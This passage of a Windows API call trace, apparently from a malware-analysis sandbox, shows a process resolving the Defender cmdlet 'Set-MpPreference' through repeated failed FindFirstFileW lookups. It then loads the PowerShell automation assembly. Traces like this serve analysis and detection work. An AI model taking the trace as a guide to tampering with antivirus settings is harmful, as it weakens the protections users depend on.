	[0042.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.BAT", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.733] GetLastError () returned 0x2
	[0042.733] SetErrorMode (uMode=0x1) returned 0x1
	[0042.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.733] GetLastError () returned 0x2
	[0042.733] SetErrorMode (uMode=0x1) returned 0x1
	[0042.733] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.CMD", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.733] GetLastError () returned 0x2
	[0042.733] SetErrorMode (uMode=0x1) returned 0x1
	[0042.733] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.733] GetLastError () returned 0x2
	[0042.734] SetErrorMode (uMode=0x1) returned 0x1
	[0042.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.734] GetLastError () returned 0x2
	[0042.734] SetErrorMode (uMode=0x1) returned 0x1
	[0042.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.734] GetLastError () returned 0x2
	[0042.734] SetErrorMode (uMode=0x1) returned 0x1
	[0042.734] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.VBE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.734] GetLastError () returned 0x2
	[0042.734] SetErrorMode (uMode=0x1) returned 0x1
	[0042.734] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.734] GetLastError () returned 0x2
	[0042.734] SetErrorMode (uMode=0x1) returned 0x1
	[0042.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.735] GetLastError () returned 0x2
	[0042.735] SetErrorMode (uMode=0x1) returned 0x1
	[0042.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.735] GetLastError () returned 0x2
	[0042.735] SetErrorMode (uMode=0x1) returned 0x1
	[0042.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.JSE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.735] GetLastError () returned 0x2
	[0042.735] SetErrorMode (uMode=0x1) returned 0x1
	[0042.735] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.735] GetLastError () returned 0x2
	[0042.735] SetErrorMode (uMode=0x1) returned 0x1
	[0042.735] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSF", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.WSH", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.736] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference.MSC", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.736] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18
	[0042.736] GetLastError () returned 0x2
	[0042.736] SetErrorMode (uMode=0x1) returned 0x1
	[0042.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\Set-MpPreference", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.737] GetLastError () returned 0x2
	[0042.737] SetErrorMode (uMode=0x1) returned 0x1
	[0042.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.737] GetLastError () returned 0x2
	[0042.737] SetErrorMode (uMode=0x1) returned 0x1
	[0042.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.ps1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.737] GetLastError () returned 0x2
	[0042.737] SetErrorMode (uMode=0x1) returned 0x1
	[0042.737] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.737] GetLastError () returned 0x2
	[0042.737] SetErrorMode (uMode=0x1) returned 0x1
	[0042.737] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psm1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.738] GetLastError () returned 0x2
	[0042.738] SetErrorMode (uMode=0x1) returned 0x1
	[0042.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.738] GetLastError () returned 0x2
	[0042.738] SetErrorMode (uMode=0x1) returned 0x1
	[0042.738] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.psd1", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.738] GetLastError () returned 0x2
	[0042.738] SetErrorMode (uMode=0x1) returned 0x1
	[0042.738] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.738] GetLastError () returned 0x2
	[0042.738] SetErrorMode (uMode=0x1) returned 0x1
	[0042.738] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.COM", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.738] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.739] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.739] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.EXE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.739] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.739] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.739] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.BAT", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.739] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.739] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.739] GetLastError () returned 0x2
	[0042.739] SetErrorMode (uMode=0x1) returned 0x1
	[0042.740] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.CMD", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.740] GetLastError () returned 0x2
	[0042.740] SetErrorMode (uMode=0x1) returned 0x1
	[0042.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.740] GetLastError () returned 0x2
	[0042.740] SetErrorMode (uMode=0x1) returned 0x1
	[0042.740] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.740] GetLastError () returned 0x2
	[0042.740] SetErrorMode (uMode=0x1) returned 0x1
	[0042.740] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.740] GetLastError () returned 0x2
	[0042.740] SetErrorMode (uMode=0x1) returned 0x1
	[0042.740] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.VBE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.741] GetLastError () returned 0x2
	[0042.741] SetErrorMode (uMode=0x1) returned 0x1
	[0042.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.741] GetLastError () returned 0x2
	[0042.741] SetErrorMode (uMode=0x1) returned 0x1
	[0042.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JS", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.741] GetLastError () returned 0x2
	[0042.741] SetErrorMode (uMode=0x1) returned 0x1
	[0042.741] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.741] GetLastError () returned 0x2
	[0042.741] SetErrorMode (uMode=0x1) returned 0x1
	[0042.741] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.JSE", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.742] GetLastError () returned 0x2
	[0042.742] SetErrorMode (uMode=0x1) returned 0x1
	[0042.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.742] GetLastError () returned 0x2
	[0042.742] SetErrorMode (uMode=0x1) returned 0x1
	[0042.742] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSF", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.742] GetLastError () returned 0x2
	[0042.742] SetErrorMode (uMode=0x1) returned 0x1
	[0042.742] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.742] GetLastError () returned 0x2
	[0042.742] SetErrorMode (uMode=0x1) returned 0x1
	[0042.742] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.WSH", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.742] GetLastError () returned 0x2
	[0042.743] SetErrorMode (uMode=0x1) returned 0x1
	[0042.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.743] GetLastError () returned 0x2
	[0042.743] SetErrorMode (uMode=0x1) returned 0x1
	[0042.743] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference.MSC", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.743] GetLastError () returned 0x2
	[0042.743] SetErrorMode (uMode=0x1) returned 0x1
	[0042.743] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x573ed40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x2b
	[0042.743] GetLastError () returned 0x2
	[0042.743] SetErrorMode (uMode=0x1) returned 0x1
	[0042.743] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Set-MpPreference", lpFindFileData=0x1d57f8 | out: lpFindFileData=0x1d57f8*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff
	[0042.744] GetLastError () returned 0x2
	[0042.744] SetErrorMode (uMode=0x1) returned 0x1
	[0042.746] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1d5600, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0042.746] GetLastError () returned 0xcb
	[0042.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573edcc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.747] GetLastError () returned 0x2
	[0042.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.747] GetLastError () returned 0x2
	[0042.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.747] GetLastError () returned 0x2
	[0042.747] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x573ed7c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0042.747] GetLastError () returned 0x2
